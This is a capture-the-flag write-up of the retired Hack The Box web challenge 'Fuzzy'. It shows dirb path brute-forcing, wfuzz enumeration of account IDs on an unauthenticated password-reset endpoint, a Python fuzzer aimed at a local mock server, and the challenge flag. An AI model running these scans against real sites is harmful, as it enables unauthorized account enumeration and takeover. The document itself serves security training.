Fuzzy
Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.
Challenge info
Fuzzy [by Arrexel]
We have gained access to some infrastructure which we believe is connected to the internal network of our target. We need you to help obtain the administrator password for the website they are currently developing.
The challenge

Let’s use dirb to bruteforce some paths and let’s see if we find anything interesting:
$ dirb http://docker.hackthebox.eu:36338/ /usr/share/wordlists/fuzz-Bo0oM.txt -t -l
---- Scanning URL: http://docker.hackthebox.eu:36338/ ----
+ http://docker.hackthebox.eu:36338/%2e%2e//google.com (CODE:400|SIZE:166)
==> DIRECTORY: http://docker.hackthebox.eu:36338/api/
+ http://docker.hackthebox.eu:36338/api/ (CODE:200|SIZE:39)
+ http://docker.hackthebox.eu:36338/index.html (CODE:200|SIZE:4023)
+ http://docker.hackthebox.eu:36338/js/ (CODE:403|SIZE:564)
---- Entering directory: http://docker.hackthebox.eu:36338/api/ ----
+ http://docker.hackthebox.eu:36338/api/index.html (CODE:200|SIZE:39)
The api folder definitely looks interesting, let’s dig deeper. Files will most probably have the .php extension, so pass that to the -X parameter.
$ dirb http://docker.hackthebox.eu:36338/api/ /usr/share/wordlists/wfuzz/general/big.txt -X .php -t -l
---- Scanning URL: http://docker.hackthebox.eu:36338/api/ ----
+ http://docker.hackthebox.eu:36338/api/action.php (CODE:200|SIZE:24)
Since we’re probably looking for a credential or something user-related, I did some manual guessing on the action parameter(s). After testing login and register, I noticed that reset returns a different response. Also note that the homepage (see screenshot above) mentioned the login/password reset function.

Now we need to find out what we want to reset.
We’re probably looking for a user ID, so let’s try some numbers. Entering a few guesses results in “Account ID not found”.
Let’s fuzz some numbers, automation FTW! The --hs option hides every response whose body matches that error string, so only the IDs that actually exist get through (the URL is quoted so the shell does not treat the ? as a glob):
$ wfuzz -z range,0-1000 --hs="Account ID not found" "http://docker.hackthebox.eu:36338/api/action.php?reset=FUZZ"
********************************************************
* Wfuzz 2.4 - The Web Fuzzer *
********************************************************
Target: http://docker.hackthebox.eu:36338/api/action.php?reset=FUZZ
Total requests: 1001
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000021: 200 0 L 10 W 74 Ch "20"
Total time: 4.455422
Processed Requests: 1001
Filtered Requests: 1000
Requests/sec.: 224.6700
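Putting the two guessing steps together, as an added example that is not part of the original write-up: a small Python fuzzer that first checks which action parameter behaves differently from a parameter the application cannot know about, then runs the same 0-1000 range scan as wfuzz, dropping every response that contains the error string (the equivalent of --hs). It talks to a constructed mock of action.php started on localhost; the mock’s responses and the single valid ID 20 are assumptions modelled on what the write-up shows, so the script runs offline.

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
from urllib.request import urlopen

# Assumption: the mock knows exactly one account ID. The challenge never
# reveals why 20 was valid; we only copy the observed behaviour.
VALID_ID = 20
NOT_FOUND = "Account ID not found"


class MockAction(BaseHTTPRequestHandler):
    """Constructed stand-in for /api/action.php (illustrative responses only)."""

    def do_GET(self):
        url = urlparse(self.path)
        params = parse_qs(url.query)
        if url.path != "/api/action.php":
            code, body = 404, "Not found"
        elif "reset" in params:
            # Only the reset action consults the account table.
            if params["reset"][0] == str(VALID_ID):
                code, body = 200, "You successfully reset your password!"
            else:
                code, body = 200, NOT_FOUND
        else:
            # login, register and unknown parameters all get the same generic
            # answer, which is why reset stood out during manual guessing.
            code, body = 200, "Invalid action"
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):
        pass  # keep the scan output clean


def start_mock():
    """Serve the mock on an ephemeral localhost port in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), MockAction)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_port}/api/action.php"


def fetch(url):
    with urlopen(url, timeout=5) as resp:
        return resp.read().decode()


def guess_actions(base, candidates):
    """Step 1: try candidate parameter names and keep the ones whose response
    differs from the baseline for a parameter the app cannot know about."""
    baseline = fetch(f"{base}?doesnotexist=1")
    return [name for name in candidates if fetch(f"{base}?{name}=1") != baseline]


def fuzz_ids(base, action, ids, hide):
    """Step 2: the wfuzz range scan. Like --hs, drop every response whose body
    contains the known-negative string and return the survivors."""
    hits = []
    for value in ids:
        body = fetch(f"{base}?{action}={value}")
        if hide not in body:
            hits.append((value, body))
    return hits


def run(id_range=range(0, 1001)):
    """Start the mock, guess the action, scan the ID range, tear the mock down."""
    srv, base = start_mock()
    try:
        actions = guess_actions(base, ["login", "register", "reset"])
        hits = fuzz_ids(base, actions[0], id_range, NOT_FOUND)
        return actions, hits
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    found, results = run()
    print("parameters that behave differently:", found)
    for account_id, body in results:
        print(account_id, "->", body)
```

Filtering on a known-negative string is more robust than filtering on response size, because a success message of the same length would slip through a size filter. On a real target a differing response in step 1 is a lead rather than proof: login and register may simply expect a POST, so check the method and the full response before moving on.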
The flag
ID 20 is the only payload whose response does not contain the above-mentioned error message, so it is the only one the --hs filter let through. Opening this in a browser, we get our flag 🙂
You successfully reset your password! Please use HTB{h0t_fuzz3r} to login.